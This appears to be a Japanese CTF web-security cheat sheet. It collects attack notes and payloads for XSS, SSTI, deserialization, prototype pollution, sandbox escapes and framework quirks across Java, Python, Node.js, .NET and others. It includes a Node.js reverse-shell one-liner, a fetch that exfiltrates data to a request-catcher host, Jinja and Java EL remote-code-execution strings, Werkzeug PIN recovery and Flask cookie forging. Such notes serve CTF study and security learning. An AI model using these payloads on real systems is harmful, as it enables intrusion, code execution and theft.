  - PostMessageでurlを渡して開いている部分があったから、javescript:にしたらXSSできた
todo: 対策
- オリジンを確認する必要がある
GitHub - opnsec/postMessage-logger: Simple "postMessage logger" Chrome extension
- postMessageをロギングしてくれるGoogle Chrome拡張
Stealing tokens, emails, files and more in Microsoft Teams through malicious tabs | by Evan Grant | Tenable TechBlog | Jun, 2021 | Medium
- いい攻撃コードが載っている。攻撃対象となるサイトをiframeで開いてpostMessageして、receiveして情報を抜き取る。
postMessage issues · EdOverflow/bugbountywiki Wiki
ペンテスト手法
- postMessage XSS on a million sites | Detectify Labs
  - window.postMessage("hello", "*")"で何か引っかかってこないか見てみる。
  - 実行先でDOM XSSがないかを探す
  - PoCを作るときはiframeを使えばいい html <iframe id="frame" src="https://targetpage/using_addthis"></iframe> <script> document.getElementById("frame").postMessage('at-share-bookmarklet://ATTACKERDOMAIN/xss.js', '*'); </script>
- The pitfalls of postMessage | Detectify Labs
  - 逆にlistenerを作って情報を抜き出す方法も紹介されている
- Chrome Devtoolsを開いてSourcesのGlobal Listenersでリスナーが見られる

2021-12-20

CTFのWebセキュリティにおけるその他言語まとめ（C#, .NET, GO, Java, Perl, Ruby）

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の20日目の記事です。

ASP.NET

要求の検証-スクリプト攻撃の防止 | Microsoft Docs
- ASP.NETでは怪しいリクエストはブロックしてくれる機能が備わっている
- ブロックされたもの <s>, &#
Web.config
- httpCookies
  - HttpOnlyCookies: trueならHttpOnlyつける。defaultはfalse
  - RequireSSL: trueならsecureをつける。defaultはfalse
  - SameSite: defaultは.NET Framework 4.7.2以降ならLax、それより前はNone
Value Shadowing、Requestの罠
- Request["param1"]とデータを取得すると、QueryString, Form, Cookies, ServerVariablesの順でparam1に対応するものを取ってくる
  - なので、GETパラメタを想定しているものはギリギリセーフで、他はアウト
- 作問ネタ
  - バリデーションではRequest["userid"]でやってるけど、処理はCookie["userid"]でやっていたら、QueryStringに安全なやつを入れておいて、Cookieに攻撃コードを入れておけば攻撃できる
  - バリデーションではどこでuseridが来てもバリデーションされるようにRequestを使っていたとすればいい
- つまり実装想定ではCookieからであってもGET Parameterを入れると、そちらを採用してしまう
- なお、これはASP.NET Coreではこの機能は消されているので安全になっている
aspx
- 出力について
  - <%= 出力文字列 %>とやるとそのまま出力するのでXSS成立
  - <%: 出力文字列 %>とやるとhtmlエンコードしてくれる
- Headerについて
  - Content-sniffing対策として、然るべきContent-Typeはつけておくこと
    - 無い場合はapplication/octet-stream
  - HttpResponseでのヘッダー追加
    - EnableHeaderChecking=true（かつ、デフォルトはtrue）ならHeader injectionについては問題ない
    - HttpResponseでAddHeaderとAppendHeaderとあるが、どっち使っても一緒
      - AddHeaderは下位互換で存在してるだけっぽいので、AppendHeaderを使っておけばいいみたい
- webshell webshell/cmd.aspx at master · tennc/webshell
ashx
- HttpCombiner ASP.NET - Remote File Disclosure - ASP webapps Exploit
  - http://[host]/css/HttpCombiner.ashx?s=~/web.config&t=text/xml
- Cute Editor ASP.NET - Remote File Disclosure - ASP webapps Exploit
  - http://www.site.com/CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config
Blazor
- 出力について
  - ok @[userinput]
  - ng @Html.Raw([input])
テク
- IIS/ASPではURLに%単体が入っている場合は無視するという仕様がある
  - DEC%LAREとすればDECLAREと認識されて、IDS/WAFをbypassできる
- 設定ファイルが誤って公開されてないか web.config
- IIS - Internet Information Services - HackTricks
  - /trace.axdにアクセスすれば設定によっては色々見れる
- ViewStateジェネレータ
  - 0xacb/viewgen: viewgen is a ViewState tool capable of generating both signed and encrypted payloads with leaked validation keys
- Unsafe ViewState Deserializationがあるっぽい
  - Exploiting ViewState Deserialization using Blacklist3r and YSoSerial.Net - NotSoSecure
- GodFather OrwaさんはTwitterを使っています「#bugbountytip #bugbountytips Check these end all the time Target/elmah.axd? You can found info like Session cookies Session state Query string and post variables IP addresses which potentially leads to account takeover of all the account who makes a request to the target https://t.co/jHikiTVc1r」 / Twitter
  - axdは怪しい？ /elmah.axd?でログが見られた？

Csharp

サニタイズ絡み
- エスケープ関数一覧
  - HttpUtility.HtmlEncode
  - HttpUtility.HtmlAttributeEncode
- URL Get parameter系
  - 単純にはUri.EscapeDataStringを使う
    - Url.EscapeUriStringというのもあるが、こっちは使ってはいけない
    - ref: .net - What's the difference between EscapeUriString and EscapeDataString? - Stack Overflow
  - C# クエリストリング(?var=hoge&...)を作る - け日記
    - 本当はここにあるようにURLをクラスで作ってもらうのが理想
    - Query系は自分で作らないの鉄則
LINQ
- LINQ使っとけばSQLi系はとりあえず安全（構文壊す系は）
- LINQPadを使えば、コードからLINQ内部で使われているSQL文を表示させることができる
Unsafe Deserialization
- https://www.nccgroup.com/globalassets/our-research/uk/images/whitepaper-new.pdf

.NET

Unsafe Deserialization
- JSONとかXMLとかデシリアライズする時の危険性の話。.NETだと固有なことがある？
- 資料
- tools
  - pwntester/ysoserial.net: Deserialization payload generator for a variety of .NET formatters
- writeups
  - WhoAmI

Go言語

curl --path-as-is -X CONNECT http://gofs.web.jctf.pro/../flag
- http.HandleFunc("/flag", func(w http.ResponseWriter, r *http.Request) {
- こういう感じに/flagのアクセスについては制限がかかっていたときに、以上でバイパスできる
- これはCONNECTメソッドでの呼び出し時にはpath canonicalizationをやらないためである
脆弱性
- net/http: FileServer incorrectly parses Range header when a range starts with two minus signs · Issue #40940 · golang/go · GitHub
static analysis
- セキュアにGoを書くための「ガードレール」を置こう - 安全なGoプロダクト開発に向けた持続可能なアプローチ - Flatt Security Blog

Java

Expression Languages
- SPEL expression
  - RCEできる"test".length()を試してみよう。うまくいけば4がでてくる
  - CTFtime.org / De1CTF 2020 / calc / Writeup
- JEXL Injection
  - Detecting JEXL injections with CodeQL | The blog of a gypsy engineer
RCE "a".class.forName("java.la"+"ng.Ru"+"ntime")で実質java.lang.Runtimeと使える。
output a file java.nio.file.Files.readAllLines(java.nio.file.Paths.get("/flag"))
- %27sam%27.class.forName(%27java.nio.file.Files%27).readAllLines(%27sam%27.class.forName(%27java.nio.file.Paths%27).get(%27/flag%27))
RASP: Runtime Application Self Protection
- これがあると、コードインジェクションを防衛するみたい。（Tomcatとか）
new java.io.BufferedReader(new java.io.InputStreamReader(T(java.lang.Runtime).getRuntime().exec('ls').getInputStream())).readLine()
- 服务端模板注入攻击(SSTI)学习 | 3ND's Blog
'a'.concat('b')
- フィルタ回避の文字列分割はconcatが便利かも
Javaでファイル取ってくるとき java.nio.file.Files.readAllLines(java.nio.file.Paths.get("/flag.txt"))
Tomcat Version 9.0.24
- GhostCatという名前のCVE-2020-1938
- 00theway/Ghostcat-CNVD-2020-10487: Ghostcat read file/code execute,CNVD-2020-10487(CVE-2020-1938)
  - これがすごい便利
- ファイル構成(Standard Directory Layout) → Application Developer's Guide (9.0.33) - Deployment
- javaのclassファイルを取ってきてデコンパイルして、中身を確認する
  - python ajpShooter.py http://netcorp.q.2020.volgactf.ru:7782 8009 /WEB-INF/classes/ru/volgactf/netcorp/ServeComplaintServlet.class read -o complaint.class
  - jad -s java *class

Thymeleaf

テンプレートエンジン。SSTIできるかも。

使えそうな情報
- Tutorial: Thymeleaf + Spring
  - Use Spring Expression Language (Spring EL) as a variable expression language, instead of OGNL. Consequently, all ${...} and *{...} expressions will be evaluated by Spring’s Expression Language engine.
  - SPELで使える攻撃が使える
便利な記法 CTFtime.org / SharkyCTF / WebFugu
- 全部の変数情報取得 html <tr th:each="var : ${#vars.getVariableNames()}"> <td th:text="${var}"></td> <td th:text="${#vars.getVariable(var)}"></td> </tr>
- フィールドの確認 html <tr th:each="var : ${flag.class.declaredFields}"> <td th:text="${var.name}"></td> <td th:text="${var}"></td> </tr>
- メソッドの確認 html <tr th:each="var : ${flag.class.getMethods()}"> <td th:text="${var.name}"></td> <td th:text="${var}"></td> </tr>
- メソッド実行結果の確認 html <td th:text="${flag.getContent()}"></td>

Java EEのWAR形式

Java EEで開発されたWebアプリケーションを一つのファイルにパッケージする標準形式の一つ。 zipなので、zipにして解凍すればいい。一回解凍してみたら、以下のような感じになっていた。多分、META-INF, WEB-INFは固定であって、それ以外が普通のWebリソース？

root
- META-INF
- WEB-INF
  - web.xmlっていうマニフェストファイルがある
    - ここのservlet-mappingのurl-poatternが接続先
- index.html

Unsafe Java Object Deserialization

.NETのときと同様にgadget chainしてコード実行に持ち込む
- GitHub - frohoff/ysoserial: A proof-of-concept tool for generating payloads that exploit unsafe Java object deserialization.
Java Deserialization — From Discovery to Reverse Shell on Limited Environments | by Francesco Soncina (phra) | ABN AMRO — Red Team | Medium
- change Runtime exec(String) to exec(String[]) · Issue #71 · frohoff/ysoserial · GitHub
- code white | Blog: $@|sh – Or: Getting a shell environment from Runtime.exec
Javaの安全でないデシリアライゼーションの攻撃に、ysoserialがよく使用される https://github.com/frohoff/ysoserial
- ysoserialをforkしてpayloadを追加するなど機能拡張しているリポジトリが公開されている（特にTomcatにメモリWebShellを設置する機能追加が多い）
  - Tomcatのセミユニバーサルエコー方式
    - 解説記事：https://xz.aliyun.com/t/7348
    - リポジトリ：https://github.com/kingkaki/ysoserial
  - グローバルストレージに基づく新しいアイデア|一般的なエコー方式に関するTomcatの調査
    - 解説記事：https://mp.weixin.qq.com/s?__biz=MzIwMDk1MjMyMg==&mid=2247484799&idx=1&sn=42e7807d6ea0d8917b45e8aa2e4dba44
    - リポジトリ：https://github.com/Litch1-v/ysoserial
  - TomcatベースのメモリWebshellファイルレス攻撃テクノロジー
    - 解説記事：https://xz.aliyun.com/t/7388
    - リポジトリ：https://github.com/threedr3am/ysoserial
  - CommonsBeanutilsとcommons-collectionsを使用しないShiroの逆シリアル化の利用
    - https://www.leavesongs.com/PENETRATION/commons-beanutils-without-commons-collections.html
    - https://github.com/phith0n/JavaThings

J2EE / Spring

セッション
- JSESSIONIDって名前でCookie発行されてセッションIDが付与される
Spring Boot のデフォルトの状態では、404 Not Found 等が発生した際に Whitelabel Error Page というエラーページが表示される。

解析

jarファイルとかclassファイルをデコンパイルして解析してみる
jd-gui
- apt-get install jd-guiでインストールしてjd-guiで起動するだけ
- jar,classをD&Dすれば中身が見られる

テク

web.xmlが公開状態になっていないか
writeups
- CTFtime.org / redpwnCTF 2021 / Requester
  - あんま読んでないんだけど・・・
UUID.randomUUID()は暗号学的にも安全なUnique IDが得られる

Perl

Perl難読化

ksnctf 25 Reserved 30pt - Qiita
- 予約語だけを使った難読化がある

PerlのopenにはRCE脆弱性がある

https://www.ipa.go.jp/security/awareness/vendor/programmingv1/a04_01.html

|lsみたいなファイルパスを入れると|以降が実行されて結果が返ってくる

Ruby

テク
- Dir.globは%00で区切ればOR検索になる p Dir.glob("f*\0b*") # => ["foo", "bar"]
  - SECCON 2019 Online CTF Writeup - Web - こんとろーるしーこんとろーるぶい
footprint
- 以下のようなタグが入ってればrailsのCSRF対策かも
  - railsのCSRF対策について - Qiita
  - <meta name="csrf-param" content="authenticity_token" />
  - <meta name="csrf-token" content="vtaJFQ38doX0b7wQpp0G3H7aUk9HZQni3jHET4yS8nSJRt85Tr6oH7nroQc01dM+C/dlDwt5xPff5LwyZcggeg==" />
  - トークンはセッションに入るらしいので、どこかから抜き出す以外は難しい
Gem.lockから脆弱性を洗い出す
- Facets — Scan Gemfile for Security Issues — Hakiri
Deserialization
- Deserialization on Rails

2021-12-19

CTFのWebセキュリティにおけるPythonまとめ

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の19日目の記事です。

使えるコマンド例
- cat open('/flag').read()
- pwd getcwd()
- RCE __import__('os').popen('COMMAND').read() __import__("os").system("ls")
- pythonでは;区切りするとワンライナーで書ける。import subprocess;out=subprocess.Popen("[cmd]", shell=True, stdout=subprocess.PIPE,stderr=subprocess.STDOUT);stdout,stderr=out.communicate();print(stdout);
- 参考
  - Python sandbox escape - CTF Wiki
Python 3.7.2にはUnicode正規化を利用したホスト偽装方法がある
- 課題 36216: CVE-2019-9636: urlsplit does not handle NFKC normalization - Python tracker
- https://example.com\uFF03@bing.com → https://example.comにアクセスされるがbing.comがホスト名になる
formatを利用したSSTI
- 例えばfmt_cmt = cmt.comment.format(rating=self.__dict__)というコードがあって、cmt.commentに外部からなんでも入力が入れられるとする
- この時、{rating}を入力すると、self.dictの値が出力されてしまう。formatで{rating}が変換されるためである。
- まあ、これだけならいいのだが、もっと情報を抜き出すこともできる。
  - Be Careful with Python's New-Style String Format | Armin Ronacher's Thoughts and Writings
- {rating[comments][0].__class__.__init__.__globals__}こういうペイロードもある。
  - とにかくinitが使える部分を探すのがミソか。
- lovasoa/pyformat-challenge: Python format string vulnerability exploitation challenge
  - なんか見つけた。中身見てないし、関係ないかも。
- Exploiting Python’s Eval | floyd's
  - 類題？
- python - globals in imported function is much different than globals of function in main module - Stack Overflow
  - これを見るとどうやらglobalsメソッドは関数についてくるらしい
  - だからinitに対してglobalsを呼んでいるのか
- Formatting a.__init__.__globals__[flag]
fstringを使ったRCE
- fstring(input)としている場合は{open('/flag').read()}みたいなインジェクションがいける
urlparse
- pythonのurlparseの仕様をうまく使えば、色々バイパスできる
- メモ
os.path.join is weird in python3
- Flask - When to use send_file / send_from_directory - Stack Overflow
  - ルート指定でpathが付いていれば、パスを与えることができる
    - （そうでないなら、パスはURL的に処理されてしまう）
  - send_fileであれば、相対パスを与えることができる（ディレクトリトラバーサル可能）
  - send_from_driectoryであれば、無理
- python3のjoinはこんな挙動をするので、ディレクトリトラバーサルに使える。

 >>> import os
 >>> print(os.path.join('/home', 'flag.txt'))
 /home/flag.txt
 >>> print(os.path.join('/home', '/flag.txt'))
 /flag.txt

subprocessはコマンドインジェクションができてしまう
- 特にshell=Trueとなってたら危ない
- subprocess --- サブプロセス管理 — Python 3.8.5 ドキュメント
  - shell=Trueを付けない、デフォルトの状態だと安全に渡される
  - 例えばcat flagを与えると、スペースがエスケープされて全体で1コマンド解釈されるので、shell=Trueを付けたりする
  - でも['cat', 'flag']を与えることで、shall=Trueが無くても正しく実行してくれる（しかも空白を制限できるのでやや安全）
cookieを使ってバイパス
- CTFtime.org / DefCamp CTF 2020 Online / http-for-pros / Writeup
- request.cookies['a']みたいにして、aをcookieに入れてやればいい
- {{request[request.cookies['a']][request.cookies['b']][request.cookies['c']][request.cookies['d']][request.cookies['e']][request.cookies['f']]('subprocess')[request.cookies['g']](request.cookies['h'],shell=True)}}として -"a": "__class__","b": "_get_file_stream","c": "im_func","d": "func_globals","e": "__builtins__","f": "__import__","g": "check_output","h": cmdという感じ
re.sub(r'([^_\.\sa-zA-Z0-9])', r'\\\1', s)
- とやると\nは変換されない
脆弱性
- picoCTF 2021 What's your input? - Qiita
  - 変数名を入れるとそのまま展開されて表示されるバグ
文字列しか扱えないとき
- f"{__builtins__['__import__']('os').__dict__['popen']('ls').read()}"みたいにf"{}"で囲んで文字列化
プライベート変数を参照したいとき
- Pythonのプライベート変数の振る舞いについて - Qiita
- _{クラス名}{プライベート変数名}で直接参照ができる。
__dict__でインスタンスの変数が参照可能 instance.__dict__['private_var_name'] = 'private_var_value';
メモリを改ざんすることで数値をいじるテク
- pythonでは全てがオブジェクトとして管理されており、数値もオブジェクトとしてメモリに実質的な値が格納されている。よって、メモリをいじることで数値の評価値を変えることができる
- Python - Pythonのid関数は一体何を指しているのか？｜teratail
  - id関数でメモリの場所が抜けるが、色々実装依存の所があるっぽい
- 🔰 SECCON Beginners CTF 2021 作問者 Writeup - Qiita
  - 要求としては42の数値を書き換えたい
  - 数値42の先頭アドレスを取得する id(42)とするのが理想だがこの問題では5文字までの制限があるのでid(1)として41 * 32を足すことでid(42)を求めている
  - 1のアドレス+24からが数値の中身を管理する領域なのでここまでseekして書き換える
  - 問題ではHackを書き込むので、これが32bit整数として評価されるので42はかなりでかい数値として評価される事になってフラグを得る
pythonのcodingをraw_unicode_escapeを使って、コメント部分を実行させるテク
- CTFtime.org / THC CTF 2021 / TheHiddenOne
文字種が限定されている場合のRCE
- https://codegolf.stackexchange.com/a/178973
- https://www.reddit.com/r/LiveOverflow/comments/97b0hw/help_python_code_execution_without_letters/
  - これは？
メモ
- type(int("1_1")) = <class 'int'>でint("1_1")=11となる
pdb.post_mortem(e.__traceback__)みたいなコードがあれば、ここに到達すればPDBが起動する。
- そうすれば、任意のpythonコードをインタラクティブに実行可能
- import osして、os.system("[RCE]")すればいい
pycを解析する
- uncompyle6 · PyPI
  - $ uncompyle6 parseltounge.pycとすれば普通にデコンパイルされる

ライブラリ

Flask,Twig
- HackTricks
- python向けのウェブアプリケーションフレームワーク
- セッションの形式が特殊でわかりやすい
- {{ config.items() }}とやることで、いろんな情報を表示できる {{config}}でも抜ける
- https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Template%20Injection
- secure_filenameは強い。
- debug modeの場合は/consoleが怪しい
  - consoleにPINコードがかかっているときの解析方法。LFIができれば解析可能
  - Workerbee Walkthrough (Werkzeug Debug Pin generation) - YouTube
    - werkzeug - HackTricks
      - ここの末尾にPINコードを作成するpythonコードが添付されているのでこれを埋めるようにして、情報をかき集めていく
    - probably_public_bitsを埋める
      - 1番目
        
        /proc/self/environから環境変数USERを取ってくるUSER=loremipsum
      - 2番目はそのまま
      - 3番目
        
        /proc/self/cmdlineをするとloremipsum.pyというファイル名だと分かる
        
        loremipsum.pyを取ってくるとapp = Flask(__name__)とあるので、ここはこのままFlaskでよい
      - 4番目
        
        エラー画面を見ると/usr/local/lib/python3.6/dist-packages/flask/app.pyとあるので、python3.6に修正する
    - private_bits
      - 1番目
        
        /proc/net/arpを見るとDeviceはeth0であると分かる。
        
        /sys/class/net/eth0/addressとしてMACアドレスを取得する02:42:ac:1b:00:02
        
        これを16進数でつないで10進数に変換すると得られる print(0x0242ac1b0002)=2485378547714
      - 2番目
        
        以下2つをそのままつなげたものを入れる
        
        /proc/sys/kernel/random/boot_idでb875f129-5ae6-4ab1-90c0-ae07a6134578が得られる
        
        /proc/self/cgroupの最初の要素のハッシュ値みたいなやつを取ってくる
        
        11:memory:/docker/e8c9f0084a3b2b724e4f2a526d60bf0a62505f38649743b8522a8c005b8334aeのe8c9f0084a3b2b724e4f2a526d60bf0a62505f38649743b8522a8c005b8334ae
        
        よって、b875f129-5ae6-4ab1-90c0-ae07a6134578e8c9f0084a3b2b724e4f2a526d60bf0a62505f38649743b8522a8c005b8334ae
    - これで実行するとPINコード126-739-410が得られて、使えば答え
- Flaskのセッション管理
  - format
    - [sessiondata].[Timestamp].[signature]
    - Baking Flask cookies with your secrets | by Luke Paris | Paradoxis
    - jwtっぽいけど、違う
  - Cookieにセッションの内容が全部入っている。secret_keyがあれば署名も可能
    - Cookieにセッションの内容がすべて入っている（スレートレス）状態になっているため、ログアウトしてCookieを削除しても、それを予めとっておいて再送すればログイン中のセッションとして使用できる
    - つまり、ログアウトの目的の1つである、古いセッションを削除して、dropcatchされても問題ないようにするという解決法が意味をなさない
      - 緩和策としてセッションの寿命を短くしておくことが挙げられる
  - sstiできるなら、configからsecret_keyを抜き出すことも可能
  - flask_jwtを使うことでjwtが使える
  - Tools
    - GitHub - noraj/flask-session-cookie-manager: Flask Session Cookie Decoder/Encoder
    - flask-unsignツールを使うと簡単にブルートフォースで解析可能
      - インストール pip install flask-unsign flask-unsign[wordlist]
      - 中身見る flask-unsign -d -c "[cookie]"
      - パスワード解析 flask-unsign -c "[cookie]" --unsign
      - 作り直す flask-unsign --sign --secret password1 --cookie "{'flagship': True, 'username': 'toto'}"
    - 辞書攻撃が効く問題も見たことがある
      - rockyou.txtで解析したいとき flask-unsign -c "[cookie]" --unsign --wordlist tools/rockyou.txt --no-literal-eval
- send_fileするときにMIMEタイプが設定されていない場合は、拡張子からMIMEタイプが推論されて付与される
flask_admin
- クラスでモデルを作ってDB編集を簡単に行えるようにしたフレームワーク
  - from flask_admin import Adminみたいにインポートしてる
- これを使えば以下ルールでDBをいじれる
  - /admin/[Table名]/ Table内容を確認する
  - /admin/[Table名]/edit/?id=XX id=XXである要素を編集できる
  - /admin/[Table名]/new Tableに新しい要素を追加する
- 問題
  - CTFtime.org / VolgaCTF 2021 Qualifier / flask-admin
Flaskのwerkzeugで使われるパスワードハッシュ
- from werkzeug.security import generate_password_hashで使われるパスワードハッシュ
- pbkdf2:sha256:150000$ODedbYPS$4d1bd12adb1eb63f78e49873cbfc731e35af178cb9eb6b8b62c09dcf8db76670こんなかんじ
jinja
- RCE1
  - getパラメタを使ってうまくフィルターを回避する例
  - URL/apply?x=__class__&l=os
  - データ{{(config|attr(request.args.x)|attr('__init__')|attr('__globals__')|attr('__getitem__')('__builtins__')|attr('__getitem__')('__import__')(request.args.l)|attr('popen')('id')|attr('read')())}}
- RCE2
  - {{request.environ.__getitem__('gunicorn.socket').dup.__func__.__globals__.__getitem__('o''s').__builtins__.__getitem__('__import__')('subprocess').check_output(('bash','-c','cat strategyguide.txt'))}}
Tornade
- Tornade用のCookieの作り方
  - The Usual Suspects | csictf 2020
Pickle
- RCE脆弱性がある
- pickle.load(ここ！)に対してインジェクションできれば、発動させられる
- __reduce__メソッドはpickle.loadするときに発動して、文字列に入れ替わる
- lsを実行して、cat flagでフラグゲットパターンを見た
- not enough values to unpack (expected 3, got 2)というエラーはpickleっぽい
- flask_caching
  - キャッシュとしてpickleされたものが入ってる。なので、キャッシュポイズニングしたい場合はpickle.dumpsして先頭に!を入れてやればいい
  - flask_cache_view/メソッド名に入れればいい
  - 参考：CTF-Write-ups/CSAW Quals 2020/Web/flask_caching at master · csivitu/CTF-Write-ups
- 【Python】pickle（漬け物）は仮想マシンだった——仕組みとリスク - Qiita
weurkzerg
- デバッグモードが有効だと、エラー時に任意のpythonコードを実行できる
- /consoleでInteractive Console使えるかも
helpを使った変数表示
- flagという変数があって、help(flag)を動かすとNo Python documentation found for '[flagの中身]'というのが出力されてくる
  - b01lersCTF2021-pyjailgolf_1/README.md at main · Oceans77/b01lersCTF2021-pyjailgolf_1 · GitHub
- なんかinteractiveにも使えるっぽいhelp()ってしてそのあとflagを入れれる？

2021-12-18

CTFのWebセキュリティにおけるJavaScript,nodejsまとめ（Prototype pollution, 難読化）

Security

この記事はCTFのWebセキュリティ Advent Calendar 2021の18日目の記事です。

JavaScript / node.js

RCEワンライナー
- console.log(process.mainModule.require('child_process').execSync('ls -la').toString());
- 適当にコマンドインジェクションするとき
  - いろいろ&&コマンド;//いろいろみたいな感じにするといい。前半の色々はちゃんと実行できるように頑張ること
- リバースシェル
  - require("child_process").exec("bash -i >& /dev/tcp/[IPAddress]/[Port] 0>&1");process.exit();
x = ~~x;としてあると、xに文字列は使えず、整数しか使えない
encodeURIはエスケープとして不適切
- escape と encodeURI と encodeURIComponent を正しく使い分ける
- ここに説明があるが、encodeURIは&はエスケープされない
GET parameterは複数回指定することで上書き可能
- なるほど。今回は最後に入力したものが採用されるみたいだけど、確か実装依存。前調べたときのメモには以下のように書いてあった
- ?username=abc&username=efg
  - $_GET["username"] -> efg
  - new URL(location).searchParams.get("username") -> abc
document.writeでHTMLを書き込むと直後に再レンダリングしてくれる
- scriptタグがあれば実行もされる
途中にコメントを差し込んでも実行される
- alert(document/**/.domain);は実行される
- alert(docum/**/ent.domain);のようにキーワードをぶった切る場合は動かない
String.prototype.includes()
- 文字列のincludesは大文字小文字を区別する
- 'Blue Whale'.includes('blue') // returns false
innerHTMLとtextContent
- document.documentElement.innerHTML = 'input'はXSSに対して脆弱
  - ちなみにinnerHTMLはscriptタグを直接入れても即時実行されない
  - javascript - Can scripts be inserted with innerHTML? - Stack Overflow
- document.getElementById('body').textContent = 'input';は安全ここ
Spread operatorは他の引数をoverrideできる
- database.addData({ type: 'paste', ...req.body, uid });となっている場合、bodyにtypeがあると値をoverrideできる
- corCTF 2021 // Tom Plant
Cross-window communication
The clickjacking attack
- 参考になる資料
function () { ... }を短縮する
- アロー関数化する()=>{}
- 引数はずれてても大丈夫なので、x=>{}みたいに適当に与えればいい
.toString()するよりも+''としてキャストさせると短い
- +0でも文字列化できる（最低function時のときは）
文字列を適当に変換する [...str]+''
- str='abc' → [...str]={'a','b','c'} → [...str]+''='a,b,c'
arguments変数
- (function () { return () => arguments[0]})(() => {; /* ${FLAG} */ })()みたいに、無名関数で引数が与えられてなくてもarguments配列を使えば読める
即時関数で複数指定すると後半が実行される
- (function(){return"A";},function(){return"B";})()とするとBが帰る
bind関数
- functionに対してbind関数を使うと、thisに値を代替できる
- (function () { return String(this)[char_offset]}).bind(()=>{; /* ${FLAG} */ })()
  - thisに()=>{; /* ${FLAG} */ }が入る
URLのhashから実行コードをとってくる方法
- eval(decodeURIComponent(location.hash.slice(1)))とかいて、URL末尾に#[base64-encoded jscode]をつける
GitHub - cure53/H5SC: HTML5 Security Cheatsheet - A collection of HTML5 related XSS attack vectors
XSSのWriteup集
- Home · cure53/XSSChallengeWiki Wiki · GitHub
iframeのsrcdoc
- <iframe srcdoc="[html-tag]"></iframe>とすることでsrcdoc内部でHTMLのタグ、scriptタグが実行できる（XSSできる）
- これを使うとoriginを変更して実行できる？（よくわかってない）
改行 <CR>/<LF>/U+2028/U+2029
s = {"title":[userinput]}; title="title:"+s.title;の場合、[userinput]に{"toString":null}とやると、エラーを引き起こすことができる
window.locationまとめ例 https://example.com/admin?x=huge&y=piyo#hogehoge
- window.location.href = "https://example.com/admin?x=huge&y=piyo#hogehoge"
  - 全部
- window.location.protocol = "https:"
- window.location.host = "example.com"
  - 注意点。https://example.com:26/のようにポートが80じゃないならexample.com:26となる。なお、https://example.com:80/ならexample.com
- window.location.hostname = "example.com"
  - こっちはポートがあってもなくてもホスト名だけ
- window.location.port = 80
- window.location.search = "?x=fuga&y=piyo"
- window.location.hash = "#hogehoge"
- window.location.pathname = "/admin"
弱い比較
- ['admin'] == 'admin'がtrueであるが、['admin'] === 'admin'はfalse
nodejsでfsモジュールのreaddirを使えばls相当が可能
stringのreplaceは最初に見つけた1つ目しか変換されない
jsは配列もstringも同じような関数が使えるので、配列を与えてみるとうまくいったりする
- includesとかindexOfとかsliceとか
- 配列はstringに変換されると、['a','b','c']はa,b,cのようにコンマ結合される
Hoisting
- jsでは定義が実行より後ろであっても上手い事動くし、書き換えもできる
- function f() { console.log('pre'); } f(); function f() { console.log('post'); }を実行するとpostと出てくる
- これを利用して、コードの先頭でほぼ使われているrequireを上書きして、予期せぬタイミングで任意コードを実行するテクがあるここ
overrideされたスコープ外の要素を参照したい時
- ("global", eval)("this") - pirosikick's diary
  - こういった話。new Proxyを使って、スコープで使えるメソッドとかを限定してXSSを防ごうとするものがある
    - CTFtime.org / DiceCTF 2021 / Web IDE js const safeEval = (d) => (function (data) { with (new Proxy(window, { get: (t, p) => { if (p === 'console') return { log }; if (p === 'eval') return window.eval; return undefined; } })) { eval(data); } }).call(Object.create(null), d);
    - なんとかwindowインスタンスを得たいので、スコープ外のwindowを持ってきたい
    - const w = eval(this, "window"); w.fetch("https://evilman.requestcatcher.com/test", { method: "POST", body: "abcc" });
- vmライブラリ
  - vmとvm2ってのがあるみたい
  - Harekaze mini CTF 2020 で出題した問題の解説 - st98 の日記帳
    - this.constructor.constructor('return process')()
    - this.constructor.constructor('return process')().mainModule.require('child_process').execSync('[command]')
  - Sandboxing NodeJS is hard, here is why
関数をtoStringするとコメントも一緒に出力される
- JavaScript | 関数の定義内容をあらわす文字列を取得する(toString)
arguments.callee
- use strict下では使えないが、色々な関数にまつわる情報が抜ける
JavaScriptの RegExp オブジェクトは、global または sticky フラグが設定されている場合 (例えば /foo/g や /foo/y) はステートフルになります
- RegExp.prototype.exec() - JavaScript | MDN
- CakeCTF 2021 writeup - st98 の日記帳 - コピー
- そのため、let filter = /(\'|\\|\s)/g;というフィルタでfor (let name of neko_name) { if (filter.exec(name.toString()) === null) {こういう使われ方をしていると、neko_nameに同じ文字列を与えたとき、その文字列に対して先頭からフィルターにヒットするものを順番に返していって、末尾まで来たらnullとなり、フィルターを抜け出してしまう
innerTextを使うと自動でサニタイズされる
Webpack
- デバッグ時に利用するために、バンドル前のソースコードとバンドル後のソースコードの行の対応関係を保持している「ソースマップ」というファイルを出力することがあります。
  - 一般的にソースマップファイルはトランスパイル後のファイル名のあとに.mapを付与したファイル名になっています。
  - ここでは、main.jsのファイルのソースマップファイルがmain.js.mapに存在していることがアクセスをするとわかります。
パラメタを配列にしてうまくバイパスする
- https://example.com/page?path[]=x&path[]=index.phpこんな感じにすると、パスがx,idnex.phpと認識されたりする。
  - nodejsでは、配列を文字列解釈したときにカンマ結合するためである。
- このままだとうまく使えないので、結合時でもうまく動くように調整する
  - https://example.com/page?path[]=x&path[]=/../index.phpとすると、x,/../index.phpとなって、元のリクエストと同じになる。
AST Injection
- flatのバージョンを脆弱性のある5.0.0
- プロトタイプ汚染の脆弱性が存在する場合に、テンプレートエンジンがコードからAbstract syntax tree(抽象構文木)を組み立てる処理に介在して、 ASTを追加することで、任意の関数を実行する手法
- 参考
  - https://blog.p6.is/AST-Injection/
  - https://graneed.hatenablog.com/entry/2021/08/09/115452

プロトタイプ汚染攻撃 Prototype pollution attack

Prototype Poluttion Attack
- https://qiita.com/shellyln/items/af200a1953991de1698d
- jsのプロトタイプチェーンについては、以下が一番わかりやすかった。
  - 図で理解するJavaScriptのプロトタイプチェーン - Qiita ```
  - 指定したオブジェクトにプロパティが存在を調べる
  - なかった場合protoが参照する先で存在を調べる
  - それでもなかった場合protoが参照する・・・（ループ）
  - 最終的にnullになるまで行う。nullならundefinedを返す ```
- これでどっかのプロトタイプを汚染しておくことで、本来無いプロパティをインジェクションできるという話。
- 「環境が使い捨て+Node.js」でPrototype Pollutionっぽさがある
Gadget
- プロトタイプ汚染した状態で組み合わせると任意コード実行できたりXSSできたりするライブラリのこと。Gadget Chainという言葉もある。
